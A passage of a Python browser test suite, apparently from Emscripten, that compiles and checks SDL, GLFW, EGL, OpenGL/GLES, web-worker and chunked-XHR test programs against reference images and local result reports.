shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([test_file('test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([test_file('test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file(c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([test_file('hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('glbook', 'Common'),
test_file('glbook', 'Common', 'esUtil.c'),
test_file('glbook', 'Common', 'esShader.c'),
test_file('glbook', 'Common', 'esShapes.c'),
test_file('glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp', 0)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
